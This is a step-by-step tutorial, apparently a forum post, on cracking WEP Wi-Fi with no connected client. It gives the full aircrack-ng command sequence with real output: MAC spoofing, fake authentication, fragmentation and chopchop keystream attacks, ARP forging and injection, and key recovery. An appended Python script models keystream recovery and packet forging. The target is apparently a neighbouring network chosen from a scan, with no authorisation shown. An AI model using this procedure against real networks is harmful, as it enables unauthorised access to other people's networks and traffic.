Cracking WEP without a client
1 - Set the wireless card MAC address
2 - Start the wireless interface in monitor mode
3 - Scan for WEP access points
4 - Pick out which WEP AP you want to attack, and lock airodump-ng to that channel/BSSID
5 - Fake-authenticate to the AP with aireplay-ng
6 - Use the aireplay-ng chopchop or fragmentation attack to obtain PRGA (keystream)
7 - Use packetforge-ng to create an ARP packet from that keystream
8 - Inject the ARP packet from step 7
Final step - Crack the WEP key
Step 1: Set the wireless card MAC address
This isn't really necessary, but if you do it the command is macchanger -r wlan0 (the interface has to be down while you change it). Keep in mind this applies to the card that I have; your interface may be different. -r means random: the MAC address generated will be random. Write the faked address down, because it is the -h value for every aireplay-ng and packetforge-ng command that follows.
root@bt:~# macchanger -r wlan0
Current MAC: 00:c0:ca:33:7f:72 (Alfa, Inc.)
Faked MAC:   36:b1:e6:05:32:da (unknown)
Step 2: Start the wireless interface in monitor mode
airmon-ng start wlan0
Note once again that wlan0 is my interface. Feel free to check for yours with the iwconfig command.
You should see the following:
root@bt:~# airmon-ng start wlan0

Interface       Chipset         Driver

wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon1)
mon0            RTL8187         rtl8187 - [phy0]

If you see "monitor mode enabled" you are good to go. Use the monitor interface airmon-ng reports: in this output a mon0 already existed from an earlier run, so this run created mon1. The rest of this tutorial uses mon0; if airmon-ng gives you a different name, substitute it in every command below.
Step 3: Scan for WEP access points
airodump-ng mon0
You should see something like this (the WEP column is what we are after):

 CH  7 ][ Elapsed: 16 s ][ 2010-09-01 00:39

 BSSID              PWR  Beacons  #Data, #/s  CH  MB    ENC   CIPHER AUTH ESSID

 00:24:A5:AD:79:59  -13       26       0    0   6  54e.  WPA2  CCMP   PSK  PwnSauce
 00:1C:10:A1:C1:32  -61        3       0    0  11  54    WEP   WEP         dusty
 00:1B:5B:B3:B5:71  -63        4       2    0   8  54 .  WEP   WEP         2WIRE486
 00:18:39:B1:4D:DD  -64       14       0    0   1  54    WPA2  CCMP   PSK  rocky4191980net
 00:19:E4:48:97:A9  -63       11       0    0   1  54 .  WEP   WEP         2WIRE040
 00:18:39:62:34:EE  -63       19       0    0   6  54    OPN               linksys
 00:25:3C:F1:C9:E9  -66        5       0    0  11  54 .  WEP   WEP         2WIRE266
 00:1A:70:00:77:E4  -64       13       0    0   6  54    OPN               Moyers
 00:18:3F:2B:A2:01  -67        7       0    0   1  54 .  WEP   WEP         2WIRE305
 00:26:50:D0:4D:C9  -69        2       0    0   6  54 .  WEP   WEP         2WIRE705
 00:0F:66:D2:6E:F4  -70        5       0    0   6  54 .  WPA   TKIP   PSK  HFNET
 00:1D:7E:97:C0:1D  -71        4       0    0   1  54e   WPA2  CCMP   PSK  RRlinksys
 00:1E:E5:EB:63:6C  -69        5       0    0   6  54e.  WPA2  CCMP   PSK  jake wireless
 00:23:51:3B:89:D1  -71        3       0    0   3  54 .  WEP   WEP         2WIRE629
 00:24:B2:51:C6:CA  -71        3       0    0   1  54e.  WPA2  CCMP   PSK  Pepp-Main-Office2.4Ghz
Step 4: Pick out which WEP AP you want to attack, and lock airodump-ng to that channel/BSSID. In this case I have decided on 2WIRE040 (channel 1, BSSID 00:19:E4:48:97:A9, and note the #Data column shows 0: there is no client generating traffic). Leave this running in its own window; with -w wepcrack it writes the captured IVs to wepcrack-01.cap, which is the file aircrack-ng reads in the final step.
airodump-ng -c 1 --bssid 00:19:E4:48:97:A9 -w wepcrack mon0
-c is the channel, in this case 1
--bssid is the access point's MAC
-w is the capture file prefix, in this case wepcrack
Step 5: Use aireplay-ng to do a fake authentication with the AP. With no real client on the network, this is what makes the AP accept frames from our MAC address.
aireplay-ng -1 0 -e 2WIRE040 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-1 is the fake authentication attack
0 is the reassociation timing in seconds; 0 means authenticate and associate once, then exit
-e is the SSID, in this case 2WIRE040
-a is the access point's MAC
-h is your (faked) MAC address, in this case 36:b1:e6:05:32:da
mon0 is the wireless interface name
You should see something similar to this. Wait for the "Association successful" line before moving on; the first attempt here never got it and aireplay-ng retried.
00:47:56 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1

00:47:56 Sending Authentication Request (Open System) [ACK]
00:47:56 Authentication successful
00:47:56 Sending Association Request [ACK]

00:48:01 Sending Authentication Request (Open System) [ACK]
00:48:01 Authentication successful
00:48:01 Sending Association Request [ACK]
00:48:01 Association successful :-) (AID: 1)
Step 6: Use the aireplay-ng chopchop or fragmentation attack to obtain PRGA
Both attacks recover keystream (PRGA) for one IV without knowing the key. Let's use the fragmentation attack first.
aireplay-ng -5 -b 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da mon0
-5 is the fragmentation attack
-b is the AP MAC address, in this case 00:19:E4:48:97:A9
-h is your MAC address, in this case 36:b1:e6:05:32:da (use the same one you fake-authenticated with)
You should see this:
00:51:26 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1
00:51:26 Waiting for a data packet...
Read 114 packets...

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

        BSSID = 00:19:E4:48:97:A9  Dest. MAC = FF:FF:FF:FF:FF:FF  Source MAC = 00:19:E4:48:97:A9

        0x0000:  0842 0000 ffff ffff ffff 0019 e448 97a9  .B...........H..
        0x0010:  0019 e448 97a9 2055 df6b 2c00 2d25 81d7  ...H.. U.k,.-%..
        0x0020:  c27e 6181 7323 1df2 b8ba 990f 2470 b5c5  .~a.s#......$p..
        0x0030:  e377 3200 045a 849c 835f a199 3763 6ad6  .w2..Z..._..7cj.
        0x0040:  c366 64cc                                .fd.

Use this packet ? Y

Saving chosen packet in replay_src-0901-005130.cap
00:51:40 Data packet found!
00:51:40 Sending fragmented packet
00:51:40 Not enough acks, repeating...
00:51:40 Sending fragmented packet
00:51:42 No answer, repeating...
00:51:42 Trying a LLC NULL packet
00:51:42 Sending fragmented packet
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 384 bytes of a keystream
00:51:42 Got RELAYED packet!!
00:51:42 Trying to get 1500 bytes of a keystream
00:51:42 Got RELAYED packet!!
Saving keystream in fragment-0901-005142.xor

Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
With no client associated, the only data frames on offer are the AP's own broadcasts (FromDS: 1, Source MAC = the BSSID), and that is enough: the attack only needs one WEP data frame whose first bytes (the LLC/SNAP header) are predictable. The 1500 bytes of keystream in the .xor file are far more than the 40 bytes a forged ARP request needs.
If the fragmentation attack fails (some APs will not relay fragments), use the chopchop attack instead:
aireplay-ng -4 -h 36:b1:e6:05:32:da -b 00:19:E4:48:97:A9 mon0
-4 is the chopchop attack
-h is our MAC address, in this case 36:b1:e6:05:32:da
-b is the AP MAC address, in this case 00:19:E4:48:97:A9
mon0 is the wireless interface
You should see something similar. Chopchop is much slower than fragmentation because it recovers the frame one byte at a time, from the end, by asking the AP whether each guessed byte gives a valid ICV.
01:54:33 Waiting for beacon frame (BSSID: 00:19:E4:48:97:A9) on channel 1

        Size: 68, FromDS: 1, ToDS: 0 (WEP)

        BSSID = 00:19:E4:48:97:A9  Dest. MAC = FF:FF:FF:FF:FF:FF  Source MAC = 00:19:E4:48:97:A9

        0x0000:  0842 0000 ffff ffff ffff 0019 e448 97a9  .B...........H..
        0x0010:  0019 e448 97a9 0094 e74d 9c00 37d2 4c5b  ...H.....M..7.L[
        0x0020:  3410 24dd 7b04 bdc5 fc13 ada3 339d a06f  4.$.{.......3..o
        0x0030:  d1e2 0825 ecc8 539e c1c5 321f 55c3 58f1  ...%..S...2.U.X.
        0x0040:  1ca8 e016                                ....

Use this packet ? y

Saving chosen packet in replay_src-0901-015434.cap

Offset   67 ( 0% done) | xor = 08 | pt = 1E |  168 frames written in  2862ms
Offset   66 ( 2% done) | xor = 61 | pt = 81 |  426 frames written in  7247ms
Offset   65 ( 5% done) | xor = 2C | pt = 84 |   32 frames written in   536ms
Offset   64 ( 8% done) | xor = 0A | pt = 16 |  684 frames written in 11637ms
Offset   63 (11% done) | xor = 9A | pt = 6B |  326 frames written in  5539ms
Offset   62 (14% done) | xor = 59 | pt = 01 |  182 frames written in  3100ms
Offset   61 (17% done) | xor = 6B | pt = A8 |   39 frames written in   664ms
Offset   60 (20% done) | xor = 95 | pt = C0 |  654 frames written in 11111ms
Offset   59 (23% done) | xor = E0 | pt = FF |   14 frames written in   230ms
Offset   58 (26% done) | xor = CD | pt = FF |  753 frames written in 12813ms
Offset   57 (29% done) | xor = 3A | pt = FF |  669 frames written in 11369ms
Offset   56 (32% done) | xor = 3E | pt = FF |   19 frames written in   320ms
Offset   55 (35% done) | xor = 61 | pt = FF |  276 frames written in  4701ms
Offset   54 (38% done) | xor = AC | pt = FF | 1960 frames written in 33312ms
Offset   53 (41% done) | xor = 36 | pt = FE | 1100 frames written in 18705ms
Offset   52 (44% done) | xor = ED | pt = 01 |   91 frames written in  1546ms
Offset   51 (47% done) | xor = 8D | pt = A8 |  144 frames written in  2443ms
Offset   50 (50% done) | xor = C8 | pt = C0 |   42 frames written in   714ms
Offset   49 (52% done) | xor = 4B | pt = A9 |  173 frames written in  2941ms
Offset   48 (55% done) | xor = 46 | pt = 97 | 2360 frames written in 40130ms
Offset   47 (58% done) | xor = 27 | pt = 48 |  320 frames written in  5435ms
Offset   46 (61% done) | xor = 44 | pt = E4 | 1281 frames written in 21766ms
Offset   45 (64% done) | xor = 84 | pt = 19 | 1650 frames written in 28064ms
Offset   44 (67% done) | xor = 33 | pt = 00 |  241 frames written in  4091ms
Offset   43 (70% done) | xor = A2 | pt = 01 |  193 frames written in  3289ms
Offset   42 (73% done) | xor = AD | pt = 00 |  613 frames written in 10407ms
Offset   41 (76% done) | xor = 17 | pt = 04 |  163 frames written in  2776ms
Offset   40 (79% done) | xor = FA | pt = 06 | 1353 frames written in 23009ms
Offset   39 (82% done) | xor = C5 | pt = 00 |  136 frames written in  2305ms
Offset   38 (85% done) | xor = B5 | pt = 08 | 2027 frames written in 34467ms
Offset   37 (88% done) | xor = 05 | pt = 01 |  488 frames written in  8295ms
Offset   36 (91% done) | xor = 7B | pt = 00 |   18 frames written in   303ms
Offset   35 (94% done) | xor = DB | pt = 06 |  229 frames written in  3890ms
Offset   34 (97% done) | xor = 2C | pt = 08 |  404 frames written in  6871ms

Saving plaintext in replay_dec-0901-015714.cap
Saving keystream in replay_dec-0901-015714.xor

Completed in 152s (0.20 bytes/s)

Success ^ :)
Read the pt column from the bottom up and you can see what was decrypted: 08 06 (EtherType ARP), then an ARP request (00 01 08 00 06 04 00 01) from 00:19:E4:48:97:A9 / 192.168.1.254 asking for 192.168.1.107, and the last four bytes (offsets 64 to 67) are the ICV. The six bytes before offset 34 are the fixed start of the LLC/SNAP header (AA AA 03 00 00 00), which is why the run stops at 97%. The resulting keystream covers exactly the 40 bytes (36-byte LLC+ARP plus 4-byte ICV) a forged ARP request needs.
Step 7: Use packetforge-ng to create an ARP packet
packetforge-ng -0 -a 00:19:E4:48:97:A9 -h 36:b1:e6:05:32:da -k 255.255.255.255 -l 255.255.255.255 -y fragment-0901-005142.xor -w wepcrack
-0 means create an ARP packet
-a is the AP MAC, in this case 00:19:E4:48:97:A9
-h is your MAC address, in this case 36:b1:e6:05:32:da
-k is the destination IP (most APs will respond fine with this setting)
-l is the source IP (again, most APs will respond fine with this)
-y is the file you get your PRGA from, in this case fragment-0901-005142.xor (if you used chopchop instead, give it the replay_dec-*.xor file it saved)
-w is the name of the output file, in this case wepcrack. This is a single forged frame, separate from the wepcrack-01.cap capture airodump-ng is writing.
Success will look like this:
Wrote packet to: wepcrack
Step 8: Inject the ARP packet
aireplay-ng -2 -r wepcrack mon0
-2 is interactive packet replay
-r is the file to read the ARP packet from, in this case wepcrack
You should see something similar:
No source MAC (-h) specified. Using the device MAC (00:C0:CA:33:7F:72)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

        BSSID = 00:19:E4:48:97:A9  Dest. MAC = FF:FF:FF:FF:FF:FF  Source MAC = 00:C0:CA:33:7F:72

        0x0000:  0841 0201 0019 e448 97a9 00c0 ca33 7f72  .A.....H.....3r
        0x0010:  ffff ffff ffff 8001 df6e f700 79d3 cc92  .........n..y...
        0x0020:  f911 0d44 a461 c287 e878 caf7 61ea edbc  ...D.a...x..a...
        0x0030:  a2cc 2b96 c8fa 1097 cb73 75ac cfd6 f8c6  ..+......su.....
        0x0040:  eea8 f908                                ....

Use this packet ? y
Note the first line: without -h, aireplay-ng replaced the source MAC with the card's real address (00:C0:CA:33:7F:72), not the 36:b1:e6:05:32:da we fake-authenticated with. It still worked against this AP, but to keep the two consistent add -h 36:b1:e6:05:32:da to the command above.
Now we wait for about 40,000 IVs. If you take a look at your airodump-ng window you will see the #Data count start to skyrocket: every replayed ARP request makes the AP answer with a freshly encrypted frame, and each one carries a new IV. When this reaches 40,000 hit ctrl+C in the aireplay-ng window to stop injecting (aircrack-ng can also be run on the capture file while airodump-ng is still writing to it).
Success :)

 CH  1 ][ Elapsed: 27 mins ][ 2010-09-01 01:19

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:19:E4:48:97:A9  -67  33     8396    43869   41   1  54 . WEP  WEP         2WIRE040
Final step: Crack the WEP key
aircrack-ng -b 00:19:E4:48:97:A9 wepcrack*.cap
-b is the AP MAC address, in this case 00:19:E4:48:97:A9
wepcrack*.cap matches the capture file(s) airodump-ng wrote from the -w wepcrack prefix in step 4 (wepcrack-01.cap and so on); the argument has to match that prefix, not the forged packet file.
After a few seconds you will get the key:

                                 Aircrack-ng 1.0 r1645

                 [00:00:00] Tested 74 keys (got 43384 IVs)

   KB    depth   byte(vote)
    0    0/  2   82(57088) CE(52224) 09(51968) F1(51712) 8A(51200) 3E(50944) 52(50432) 4E(50176) 4F(50176) 93(50176) 35(49920) EE(49920) 13(48896) 14(48896)
    1    1/  3   90(52736) F9(52224) 2E(51200) D5(50944) BA(50688) B9(50432) 51(49920) C1(49920) 48(49664) 35(49408) 12(49152) 9B(49152) F4(48896) 9D(48640)
    2    0/  1   73(60416) 49(54016) 79(52480) 11(52224) 22(52224) 7B(51712) EF(50944) 16(50432) 58(50432) 82(50432) D4(50432) 72(49664) 3A(49408) BA(49152)
    3    0/  6   08(56320) A8(54784) 1C(52992) B3(52736) 10(52224) 8D(51968) D8(50944) 82(50688) 10(50176) 0E(49920) CB(49920) F7(49408) 5F(49152) DA(49152)
    4    0/  3   80(55808) 00(52480) 0B(51456) FC(50944) 95(50432) B7(50432) AE(49920) C0(49408) E4(49152) 24(48896) 6D(48896) 82(48896) 7F(48640) D4(48640)

                         KEY FOUND! [ 82:77:73:08:80 ]
        Decrypted correctly: 100%
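To make steps 6 to 8 concrete, here is a small Python model of what they rely on. This is an added example written for this page, not code from the tutorial's author or from the aircrack-ng suite. It implements WEP's framing (RC4 keyed with IV||key, CRC32 ICV), recovers 8 keystream bytes from a sniffed frame by XORing against the fixed LLC/SNAP header, grows that keystream the way the fragmentation attack does (the AP re-broadcasts reassembled fragments under its own IV), and then forges the same kind of ARP request packetforge-ng builds, without ever using the key. The key is the one aircrack-ng found above and the two IVs are lifted from the frames shown above; the AP model, the ARP fields and the filler bytes are constructed for the demo, and 802.11 headers, the key-id byte and radio behaviour are not modelled.

```python
# Added example for this page, not code from the tutorial or from aircrack-ng.
# WEP frame body = IV || RC4(IV||key) XOR (plaintext || CRC32 ICV). The IV is
# sent in clear and may be reused, and the ICV is a linear CRC rather than a
# MAC, so whoever learns the keystream for one IV can encrypt anything under it.
# Constructed for the demo: the AP model, the ARP fields and the filler bytes.
import struct
import zlib

def rc4(key: bytes, length: int) -> bytes:
    """RC4 keystream of `length` bytes for `key` (KSA then PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def icv(data: bytes) -> bytes:
    """WEP integrity check value: plain CRC32, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """What a station or AP transmits: 3-byte IV, then RC4(plaintext || ICV)."""
    data = plaintext + icv(plaintext)
    return iv + xor(data, rc4(iv + key, len(data)))

def wep_decrypt(key: bytes, frame: bytes):
    """What the AP does on receipt: decrypt, check the ICV; None means the frame is dropped."""
    iv, body = frame[:3], frame[3:]
    data = xor(body, rc4(iv + key, len(body)))
    pt = data[:-4]
    return pt if icv(pt) == data[-4:] else None

# Every WEP data frame carrying ARP starts with this LLC/SNAP header: the known
# plaintext both the fragmentation and the chopchop attack start from.
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")

def recover_keystream(frame: bytes, known_plaintext: bytes = LLC_SNAP_ARP):
    """keystream = ciphertext XOR known plaintext, no key involved. Returns (iv, keystream);
    this is the content aireplay-ng saves to the .xor file."""
    return frame[:3], xor(frame[3:], known_plaintext)

def forge(iv: bytes, keystream: bytes, plaintext: bytes) -> bytes:
    """packetforge-ng's job: encrypt a new payload using only an IV and its keystream."""
    data = plaintext + icv(plaintext)
    if len(keystream) < len(data):
        raise ValueError(f"need {len(data)} keystream bytes, have {len(keystream)}")
    return iv + xor(data, keystream)

def ap_relay(key: bytes, ap_iv: bytes, fragments):
    """Constructed AP model for the fragmentation attack: accept fragments under any IV,
    drop any with a bad ICV, reassemble, re-broadcast the whole payload under its own IV."""
    parts = [wep_decrypt(key, f) for f in fragments]
    return None if None in parts else wep_encrypt(key, ap_iv, b"".join(parts))

def extend_keystream(relay, iv: bytes, keystream: bytes, filler: bytes, n_frags: int = 16):
    """One round of the fragmentation attack. With k keystream bytes we can encrypt
    fragments of k-4 bytes (4 go to the ICV); the AP relays n_frags*(k-4) bytes of
    plaintext we chose, and XORing its relay against that plaintext yields
    n_frags*(k-4)+4 keystream bytes for the AP's IV. Returns (ap_iv, longer keystream)."""
    chunk = len(keystream) - 4
    n_frags = min(n_frags, len(filler) // chunk)
    pieces = [filler[i * chunk:(i + 1) * chunk] for i in range(n_frags)]
    relayed = relay([forge(iv, keystream, p) for p in pieces])
    if relayed is None:
        raise RuntimeError("AP dropped a fragment")
    known = b"".join(pieces)
    return recover_keystream(relayed, known + icv(known))

def build_arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + ARP who-has, the payload packetforge-ng -0 -k <dst ip> -l <src ip> builds."""
    return LLC_SNAP_ARP + struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                                      sender_mac, sender_ip, bytes(6), target_ip)

def demo(target_keystream: int = 1500) -> dict:
    key = bytes.fromhex("8277730880")     # key aircrack-ng found above; only the AP model reads it
    ap_iv = bytes.fromhex("0094e7")       # IV of the chopchop frame above, reused by the AP model
    # A sniffed AP broadcast (IV from the fragmentation frame above); we know only its first 8 bytes.
    sniffed = wep_encrypt(key, bytes.fromhex("2055df"), LLC_SNAP_ARP + bytes(28))
    iv, ks = recover_keystream(sniffed)                  # 8 bytes of PRGA
    relay = lambda frags: ap_relay(key, ap_iv, frags)    # the attacker side only sees frames
    filler = bytes(range(256)) * 8                       # constructed fragment payload
    while len(ks) < target_keystream + 4:                # +4 for the forged frame's ICV
        iv, ks = extend_keystream(relay, iv, ks, filler)
    arp = build_arp_request(bytes.fromhex("36b1e60532da"), b"\xff" * 4, b"\xff" * 4)
    forged = forge(iv, ks, arp)                          # no key used here
    return {"keystream_bytes": len(ks), "forged_body_bytes": len(forged),
            "ap_accepts": wep_decrypt(key, forged) == arp}

if __name__ == "__main__":
    print(demo())
```

Running demo() goes 8 -> 68 -> 1028 -> 2052 keystream bytes in three relay rounds and ends with the AP decrypting the forged 43-byte body (3-byte IV, 36-byte LLC+ARP, 4-byte ICV) to exactly the ARP request we chose. Compare that with the real 68-byte frames above: 24 bytes of 802.11 header, 4 bytes of IV plus key-id, 36 bytes of LLC+ARP and the 4-byte ICV.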
I hope you enjoyed my tutorial.
Securityxxxpert
Note: I will be making a video as well to attach when time permits.